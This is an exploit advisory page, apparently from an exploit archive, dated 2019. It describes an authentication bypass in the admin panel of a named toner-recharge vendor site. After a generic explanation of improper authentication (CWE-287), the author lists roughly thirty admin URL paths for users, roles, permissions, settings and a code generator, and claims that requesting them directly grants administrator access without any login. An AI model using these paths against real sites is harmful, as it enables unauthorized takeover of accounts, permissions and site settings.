RecargatonerAntequera Improper Authentication Vulnerability

2019.08.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-287

#################################################################### # Exploit Title : RecargatonerAntequera Improper Authentication Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 20/08/2019 # Vendor Homepage : recargatonerantequera.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-287 [ Improper Authentication ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Impact : *********** Authentication is any process by which a system verifies the identity of a user who wishes to access it.When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. Improper authentication occurs when an application improperly verifies the identity of a user. A software incorrectly validates user's login information and as a result, an attacker can gain certain privileges within the application or disclose sensitive information that allows them to access sensitive data and provoke arbitrary code execution. The weakness is introduced during Architecture and Design, Implementation stages. #################################################################### # Authentication Bypass / Admin Panel Login Bypass Exploit : ****************************************************** Actually the system asks us admin username and password but we don't need to know admin username and password just add this links without writing /admin after domain name. Yes, and now we jumped over the wall. You are in the Administrator Panel. Congratulations. /recargatoner/index.php/admin/users /recargatoner/index.php/admin/users/create /recargatoner/index.php/admin/users/1/edit /recargatoner/index.php/admin/roles /recargatoner/index.php/admin/roles/create /recargatoner/index.php/admin/roles/1/edit /recargatoner/index.php/admin/permissions /recargatoner/index.php/admin/permissions/1/edit /recargatoner/index.php/admin/permissions/create /recargatoner/index.php/services /recargatoner/index.php/services/1/edit /recargatoner/index.php/services/create /recargatoner/index.php/products /recargatoner/index.php/products/create /recargatoner/index.php/products/1/edit /recargatoner/index.php/brands /recargatoner/index.php/brands/5/edit /recargatoner/index.php/brands/create /recargatoner/index.php/lines /recargatoner/index.php/lines/9/edit /recargatoner/index.php/lines/create /recargatoner/index.php/entryunits /recargatoner/index.php/entryunits/6/edit /recargatoner/index.php/entryunits/create /recargatoner/index.php/stores /recargatoner/index.php/stores/create /recargatoner/index.php/about /recargatoner/index.php/admin/activitylogs /recargatoner/index.php/admin/settings /recargatoner/index.php/admin/generator #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top